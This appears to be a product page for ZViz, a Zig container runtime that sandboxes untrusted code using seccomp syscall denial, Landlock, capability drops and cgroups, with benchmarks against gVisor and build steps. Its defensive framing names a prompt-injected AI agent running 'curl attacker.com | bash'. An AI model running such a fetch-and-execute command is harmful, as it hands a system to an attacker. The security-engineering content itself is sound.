Container isolation for code you can't trust but have to run.
ZViz is an OCI-compatible container runtime, written in Zig, that takes a selective-denial approach.
132 syscalls reach the host kernel at native speed. 24 dangerous ones are blocked at the seccomp
layer before any kernel code runs. One — socket — is argument-filtered inline.
No userspace kernel. No daemon.
$ zviz run hostile-tenant ~/bundle --verbose
[init] namespaces ............. user pid mount ipc uts
[init] capabilities ........... 41 dropped
[init] landlock ............... ruleset applied
[init] seccomp ................ 124-instr BPF loaded
[init] cgroups v2 ............. mem=512M pids=64
[ready] PID 1 in 7.8ms
[syscall] read(0, ...) ALLOW
[syscall] write(1, ...) ALLOW
[syscall] clock_gettime(...) ALLOW
[syscall] socket(AF_PACKET, ...) DENY EPERM
[syscall] ptrace(...) DENY EPERM
[syscall] mount(...) DENY EPERM
[syscall] init_module(...) DENY EPERM
[broker] socket(AF_INET, SOCK_STREAM, 0) inspected ok
Output shape based on README's --verbose behavior; not a recorded session.
You're running code you didn't write.
Containers built on namespaces and cgroups leave the full kernel attack surface exposed. Every runc escape CVE is a reminder that "containerized" isn't a security strategy.
AI agents executing LLM-generated code
One prompt injection from curl attacker.com | bash. Selective denial means the exploit fails at step 1.
CI pipelines on opaque dep trees
npm install on 47 transitive deps you have not audited. Drop caps, deny network, keep the build.
Third-party plugins that "need shell access"
Landlock restricts filesystem access and all capabilities are cleared. The plugin runs as PID 1 inside fresh user and PID namespaces.
Multi-tenant workloads next to each other
Fresh user + pid + mount + ipc + uts namespace per container. The kernel boundary is the actual boundary.
Five enforcement layers, applied in order.
Ordering is load-bearing. Capabilities drop before seccomp loads. Landlock applies before seccomp so its own setup syscalls aren't self-blocked.
Namespaces
user, pid, mount, ipc, uts — resource isolation
Capabilities
all 41 Linux capabilities dropped — no CAP_SYS_*
Landlock LSM
unprivileged filesystem access control
Seccomp-BPF
124-instruction filter — ALLOW / DENY / BROKER
cgroups v2
memory, PID, CPU limits — fork bombs contained
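The ordering rules can be checked mechanically. The sketch below is a small Python model, not ZViz's Zig source: the names `LAYERS`, `MUST_PRECEDE`, and `check_order` are hypothetical, and the only facts it encodes are the five layers in the order listed and the two constraints stated above.

```python
# Illustrative model only; ZViz itself is written in Zig.
# Layer names follow the list above; all identifiers here are hypothetical.
LAYERS = ["namespaces", "capabilities", "landlock", "seccomp", "cgroups"]

# (earlier, later) pairs taken from the ordering rules stated in the text.
MUST_PRECEDE = [
    ("capabilities", "seccomp"),  # capabilities drop before seccomp loads
    ("landlock", "seccomp"),      # Landlock setup must not be self-blocked
]


def check_order(layers, constraints=MUST_PRECEDE):
    """Return the list of violated (earlier, later) constraints."""
    position = {name: index for index, name in enumerate(layers)}
    return [
        (earlier, later)
        for earlier, later in constraints
        if position[earlier] > position[later]
    ]


# The documented order satisfies both constraints.
print(check_order(LAYERS))

# Loading seccomp before Landlock is flagged as a violation.
swapped = ["namespaces", "capabilities", "seccomp", "landlock", "cgroups"]
print(check_order(swapped))
```

A check like this is cheap to run in a test suite whenever the setup sequence changes.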
runc: App → Kernel (all syscalls available). Namespaces + cgroups only.
gVisor: App → Sentry userspace kernel (emulates ~300 syscalls) → Host kernel (~70).
ZViz: App → BPF filter → ALLOW (132, native) / DENY (24) / BROKER (mediated).
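The three-way verdict on the BPF filter path can be modelled in a few lines. This is a hedged Python sketch of the decision logic only, not the 124-instruction BPF program. The syscall names are the handful that appear in the sample verbose output, the function `decide` is hypothetical, and which socket families the filter permits is an assumption based on that same output.

```python
import errno

# Linux address-family constants.
AF_INET = 2
AF_PACKET = 17

# Small example subsets; the full lists (132 allowed, 24 denied) are not
# reproduced here. Names come from the sample verbose output.
ALLOW = {"read", "write", "clock_gettime"}
DENY = {"ptrace", "mount", "init_module"}

# ASSUMPTION: the permitted socket families are not stated in the text.
# AF_INET passing and AF_PACKET failing mirrors the sample output.
PERMITTED_SOCKET_FAMILIES = {AF_INET}


def decide(syscall, args=()):
    """Return (verdict, errno_or_None) for one syscall in this toy model."""
    if syscall == "socket":
        # socket is the one syscall whose arguments are inspected.
        if args and args[0] in PERMITTED_SOCKET_FAMILIES:
            return ("BROKER", None)
        return ("DENY", errno.EPERM)
    if syscall in ALLOW:
        return ("ALLOW", None)
    if syscall in DENY:
        return ("DENY", errno.EPERM)
    # The text does not state the default action for unlisted syscalls,
    # so this model refuses to guess.
    raise ValueError(f"no verdict modelled for {syscall!r}")


for call, call_args in [("read", ()), ("ptrace", ()),
                        ("socket", (AF_PACKET,)), ("socket", (AF_INET,))]:
    print(call, call_args, decide(call, call_args))
```

In the real filter the allowed path adds no userspace hop, which is the point of the comparison with the Sentry path.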
The performance tax goes away when you stop emulating.
Allowed syscalls hit the host kernel directly. gVisor routes everything through its Sentry process. The clock_gettime gap is extreme because Sentry can't use the kernel vDSO.
Numbers from the ZViz repo's demo.sh --perf with the same OCI bundle and statically-linked benchmark.
| Syscall | ZViz | gVisor | Speedup |
|---|---|---|---|
| clock_gettime | 20 ns | 4,982 ns | 249x |
| read | 212 ns | 4,393 ns | 20.7x |
| write | 211 ns | 1,169 ns | 5.5x |
| getuid | 202 ns | 1,125 ns | 5.6x |
| getpid | 297 ns | 1,209 ns | 4.1x |
| open_close | 2,895 ns | 4,403 ns | 1.5x |
| stat | 1,767 ns | 2,364 ns | 1.3x |
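The Speedup column is the gVisor latency divided by the ZViz latency. A short Python sketch reproduces it from the figures in the table. The dictionary and function names are illustrative, not part of demo.sh.

```python
# Latencies in nanoseconds, copied from the table: (ZViz, gVisor).
LATENCY_NS = {
    "clock_gettime": (20, 4982),
    "read": (212, 4393),
    "write": (211, 1169),
    "getuid": (202, 1125),
    "getpid": (297, 1209),
    "open_close": (2895, 4403),
    "stat": (1767, 2364),
}


def speedup(zviz_ns, gvisor_ns):
    """Ratio of gVisor latency to ZViz latency for one syscall."""
    return gvisor_ns / zviz_ns


for name, (zviz_ns, gvisor_ns) in LATENCY_NS.items():
    print(f"{name:14s} {speedup(zviz_ns, gvisor_ns):6.1f}x")
```

The spread is wide: calls dominated by real kernel work (open_close, stat) gain little, while calls that are nearly free natively gain the most.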
Pick a profile, not a policy file.
Five named profiles cover the common shapes. Choose the closest, then narrow further if you need to.
CI / build systems
Default profile. Balanced security for general-purpose CI workloads.
HTTP APIs, services
Network allowed. Socket ops optimised for high-throughput request paths.
Data processing, ETL
No network. Memory cap 8G. For pipelines that should not phone home.
Untrusted user code
Maximum restrictions. The right starting point for agent execution.
Debugging only
Allows ptrace. NOT for production. Useful for tracing why your prod profile is blocking something.
When you should use gVisor instead.
ZViz blocks dangerous syscalls outright. gVisor emulates them in a sandboxed userspace kernel. Both achieve isolation. The approach matters for compatibility.
| If your workload needs… | Use | Why |
|---|---|---|
| ptrace (strace, debuggers) | gVisor | ZViz blocks it. gVisor emulates safely. |
| mount / unshare (Docker-in-Docker) | gVisor | Nested containers need namespace syscalls. |
| Bazel / Nix builds | gVisor | Internal sandboxing creates namespaces. |
| Maximum syscall throughput | ZViz | Native speed vs 1.3–249x emulation overhead in the benchmark table above. |
| Sub-10ms cold starts | ZViz | ~8ms vs ~200ms. |
| Strictest policy (block, don't emulate) | ZViz | Exploit code fails immediately. |
Simple rule: nested containers or process tracing → gVisor. Otherwise ZViz is faster and stricter.
Build it, point it at an OCI bundle.
Linux 5.13+ for Landlock. cgroups v2. Zig 0.15.0+ to build from source. Any OCI rootfs works — including ones produced by docker export.
On Ubuntu 24.04+ install the bundled AppArmor profile so pivot_root survives apparmor_restrict_unprivileged_userns=1. Without it, ZViz falls back to chdir-only filesystem isolation.
$ git clone https://github.com/Skelf-Research/zviz.git
$ cd zviz && zig build -Doptimize=ReleaseSafe
# Ubuntu 24.04+: load the AppArmor profile
$ sudo install -m 0644 packaging/apparmor/zviz /etc/apparmor.d/zviz
$ sudo apparmor_parser -r /etc/apparmor.d/zviz
# Grab any image as an OCI rootfs
$ mkdir -p ~/zviz-bundle/rootfs
$ docker create --name extract redis:alpine
$ docker export extract | tar -C ~/zviz-bundle/rootfs -xf -
$ docker rm extract
# Write a minimal config.json, then:
$ ./zig-out/bin/zviz run my-container ~/zviz-bundle
[ready] PID 1 in 7.8ms
ZViz auto-mounts /proc (nosuid+nodev+noexec), /sys (read-only), and a private /dev tmpfs. You don't need mounts[] entries for those.
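For the "write a minimal config.json" step, one possible shape is sketched below in Python. The field names follow the OCI runtime specification, but which fields ZViz requires or honours is an assumption, as are the `redis-server` command (guessed from the redis:alpine image), the hostname, and the helper name `minimal_config`. A runtime using user namespaces may also need ID mappings, which are omitted here.

```python
import json


def minimal_config(args, hostname="zviz"):
    """Build a minimal OCI-style runtime config as a dict.

    Sketch only: not validated against ZViz.
    """
    return {
        "ociVersion": "1.0.2",
        "process": {
            "terminal": False,
            "user": {"uid": 0, "gid": 0},
            "args": list(args),
            "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
            "cwd": "/",
        },
        # Relative to the bundle directory, e.g. ~/zviz-bundle/rootfs.
        "root": {"path": "rootfs"},
        "hostname": hostname,
        # No "mounts" entries for /proc, /sys, or /dev: per the note above,
        # ZViz mounts those itself.
        "linux": {
            "namespaces": [
                {"type": name} for name in ("user", "pid", "mount", "ipc", "uts")
            ],
        },
    }


config = minimal_config(["redis-server"])
print(json.dumps(config, indent=2))
```

Redirecting the output to ~/zviz-bundle/config.json would place it next to the rootfs directory created earlier.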
ZViz vs gVisor
Selective denial vs userspace-kernel emulation. Fair rows, grounded numbers, an honest list of what each one allows that the other blocks.
ZViz vs runc (plain Docker)
runc gives you namespaces + cgroups. ZViz adds Landlock, capability drop, seccomp filtering, and a much smaller exposed syscall surface.